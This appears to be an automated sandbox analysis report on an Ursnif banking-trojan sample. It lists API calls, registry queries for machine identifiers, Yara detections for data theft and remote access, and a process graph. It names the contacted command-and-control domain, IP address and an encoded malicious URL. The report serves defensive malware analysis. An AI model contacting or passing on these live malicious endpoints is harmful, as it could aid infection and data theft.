Source: C:\Windows\SysWOW64\rundll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 4_2_6E22E168
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C1C7D SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E1C1C7D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E1C1F10
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 432910 Sample: SecuriteInfo.com..7135.20767 Startdate: 10/06/2021 Architecture: WINDOWS Score: 76 25 Multi AV Scanner detection for domain / URL 2->25 27 Found malware configuration 2->27 29 Antivirus detection for URL or domain 2->29 31 Yara detected  Ursnif 2->31 7 loaddll32.exe 1 2->7         started        9 iexplore.exe 2 60 2->9         started        process3 process4 11 rundll32.exe 7->11         started        14 cmd.exe 1 7->14         started        16 rundll32.exe 7->16         started        18 iexplore.exe 39 9->18         started        dnsIp5 33 Writes registry values via WMI 11->33 21 rundll32.exe 14->21         started        23 authd.feronok.com 185.233.80.31, 49748, 49749, 80 SUPERSERVERSDATACENTERRU Russian Federation 18->23 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.233.80.31
 authd.feronok.com Russian Federation
50113 SUPERSERVERSDATACENTERRU true

Contacted Domains

Name IP Active
authd.feronok.com 185.233.80.31 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo true
  • Avira URL Cloud: malware
 unknown